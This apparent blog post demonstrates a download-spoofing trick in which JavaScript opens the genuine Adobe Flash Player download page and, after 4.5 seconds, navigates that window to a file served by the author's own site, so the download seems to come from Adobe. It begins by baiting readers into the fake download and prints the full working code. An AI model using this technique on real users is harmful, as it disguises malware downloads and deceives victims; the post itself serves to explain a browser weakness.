I recently came across a very sneaky yet impressive way of tricking people into downloading a malicious file. But before you continue reading you might want to download the newest Flash Player version?! Yeah, I know Flash is dead, but please give it a try anyway and see if you notice anything strange about it…
Done? Ok. So what you just downloaded was, of course, not a new Flash Player version but a possibly malicious file from my website. Maybe you noticed that the file was requested from webdevwonders.com instead of adobe.com.
The name of the domain is actually the only easy way to notice that you are just downloading a different file from another server than expected. Now imagine a malicious download from a domain like flashplayer-download.com. How many people would be suspicious, even if he or she read the name of the file host?
But lets have a look at the code now (by the way, this will NOT work in Internet Explorer):
// Called 'onclick' of the link function openFlashWebsite() { // http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer">', 'foo'); setTimeout(triggerDownload, 4500); } // Will be called after a timeout of 4.5 secs function triggerDownload() { window.open('http://webdevwonders.com/download/flashplayer', 'foo'); }
Now what is happening here? First of all the function “openFlashWebsite” is called by clicking the link. It will initiate a new window with a “text/html” data URI that will itself initiate a new window (or tab) that will immediately open the Flash Player download site via a meta refresh. But secondly, the function also starts a timeout, which will be triggered after 4.5 seconds and will open a document with a “Content-Disposition: attachment;”-Header that will trigger the download of a file called “flashplayer_11.exe”, which is served by this blog. The sneaky thing about it is, that this download will get attached directly to the opened site which will be the Adobe Flash Player download site, tricking the user into thinking that this is the expected Flash Player download. This is made possible by the concept of web browser documents having the ability to navigate other (cross-origin) windows to arbitrary URLs. A deeper explanation of the issue is given in “The Tangled Web” by Michal Zalewski, whose blog also deserves the credit for this.
